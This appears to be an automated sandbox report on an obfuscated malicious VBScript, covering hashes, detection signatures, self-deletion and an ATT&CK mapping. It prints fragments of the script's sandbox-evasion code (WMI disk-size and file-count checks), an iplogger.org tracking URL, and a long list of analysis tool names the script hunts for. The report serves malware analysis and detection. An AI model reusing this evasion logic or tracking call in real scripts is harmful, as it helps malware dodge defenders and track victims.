Loading ...

Play interactive tourEdit tour

Analysis Report files#_56117.vbs

Overview

General Information

Sample Name:files#_56117.vbs
MD5:147091e61ec59f67ab598d26f15ad0e7
SHA1:0dd98cc3868b7896b4ebca00e55ec3ce2bdc4118
SHA256:2591ec56069e41c33309c3042083c047c360c62454d52f734a79be21540c2967

Most interesting Screenshot:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5960 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\files#_56117.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: files#_56117.vbsVirustotal: Detection: 8%Perma Link

Source: wscript.exe, 00000000.00000003.1075890959.0000015A5E11C000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1N3Ei7
Source: wscript.exe, 00000000.00000003.1076460066.0000015A5E279000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1N3Ei7u

Source: files#_56117.vbsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal68.evad.winVBS@1/0@0/0
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\files#_56117.vbs'
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: files#_56117.vbsVirustotal: Detection: 8%
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(864872629)) > 0 And eerily804 = 0) ThenExit FunctionEnd IfSet LouisianaService = GetObject("winmgmts:\\.\root\cimv2")Set burbanklItems = LouisianaService.ExecQuery("Select * from Win32_LogicalDisk")For Each LCVPVzmFYoATz In burbanklItems' pont. flag lab granite proper Harcourt rutile dwarves. prospect biscuit depend adjacent farfetched anise gaggle sashay whig whereof lacquer. blocky greensward epistle tagWRLpxzbdZ = tagWRLpxzbdZ + Int(LCVPVzmFYoATz.Size / ((1073742868 - (950 - 2.0)) - (75 + 21.0)))NextIf tagWRLpxzbdZ < ((70 + ((87 - 3.0) + 285.0)) - 379.0) ThenPAnMjKKlKawcyHNEnd If' oriole mendacious perpetuate symmetry curfew, gotten Arlene Segundo hall radioactive revving, Purcell eleventh lenticular End FunctionFunction UWbEE()REM auction saddlebag chamois poi wrath Copenhagen twentyfold cubbyhole earmark hymn hypothermia endomorphism coagulable on error resume nextIf (InStr(WScript.ScriptName, cStr(864872629)) > 0 And eerily804 = 0) ThenExit FunctionEnd Ifcontrolled = Array("catheter newsletter supple plaid indict groggy permissive clang fanfold. 5436813 vivid lumbago abbe maw glissade550 hyphenate smell Ludwig rhythm chevy299 Gonzales sphagnum proprioception Ramo ")Wellesley = (((40 + 6657.0) - 203.0) - (53 + 6438.0))REM aniline crow censure anatomy Berniece fest Cluj787 Acapulco fernery adulate explicable Gustafson cautious appropriate shun FCC basidiomycetes processor. 7120026 Bangor farina officialdom mallow tactful latus Hutchinson vaccinate schooner Cyrus rear lithography adjacent238 groat CERN, 8768946 impart wiZSZrk = (((79 + 15.0) + (-16.0)) + (-(61 + 14.0)))If CreateObject("Scripting.FileSystemObject").GetFolder(LHnoyaVcivO).Files.Count < Wellesley ThenPAnMjKKlKawcyHNEnd IfSet glJpk = CreateObject("WScript.Shell")polite = glJpk.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\"If CreateObject("Scripting.FileSystemObject").GetFolder(polite).Files.Count < wiZSZrk ThenPAnMjKKlKawcyHNEnd IfREM tablespoonful chorus Kobayashi lop gallant brisk varnish. pedagogic success expanse ornament archetype, 9928097 classmate monel Koenigsberg mimicry seasonal Norton contravariant hallmark coexist onetime parentheses Davis. 4942457 pounce525, clomp crook dispensable semantic Scorpio poi573. imprint serum, 4354814 datura Auriga broach Achilles concurrent hormonal concertina, Putnam scathing semantic413 worktable, scion sceptic. were Laredo. cabinetry ' telephotography historian pleural hot occipital bout lord diadem determinacy eminent321 loggerhead Himalaya war amnesty osmium rye Spector rootstock Hitachi pronunciation Barnes safe End FunctionFunction zQrVl()Dim iEveXErawdMlYD: Set iEveXErawdMlYD = CreateObject("Scripting.FileSystemObject")Dim EHQphxSk: Set EHQphxSk = CreateObject("Shell.Application")Shelton = Array("downwind longitudinal pawnshop juke sale grief Albrecht parentage. 1561961 mask hoar Garrisonian chamois253 cloak meridional scrooge furlough tyke awoke Macadamia Perseus boxcar Shaffer pioneer, f

Hooking and other Techniques for Hiding and Protection:

barindex
Deletes itself after installationShow sources
Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\files#_56117.vbsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)Show sources
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: SYSER.EXE=
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.1086279749.0000015A61629000.00000004.00000001.sdmpBinary or memory string: ESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 468Thread sleep time: -30000s >= -30000sJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: wscript.exe, 00000000.00000002.1091015012.0000015A61D00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.1091015012.0000015A61D00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.1091015012.0000015A61D00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.1091015012.0000015A61D00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.1084980532.0000015A60BBD000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.1076346009.0000015A60BBF000.00000004.00000001.sdmpBinary or memory string: regshot.exe

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1Winlogon Helper DLLPort MonitorsVirtualization/Sandbox Evasion1Credential DumpingVirtualization/Sandbox Evasion1Application Deployment SoftwareData from Local SystemData CompressedData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaScripting121Port MonitorsAccessibility FeaturesScripting121Network SniffingSecurity Software Discovery211Remote ServicesData from Removable MediaExfiltration Over Other Network MediumFallback ChannelsExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionFile Deletion1Input CaptureSystem Information Discovery2Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic ProtocolExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information1Credentials in FilesSystem Network Configuration DiscoveryLogon ScriptsInput CaptureData EncryptedMultiband CommunicationSIM Card SwapPremium SMS Toll Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.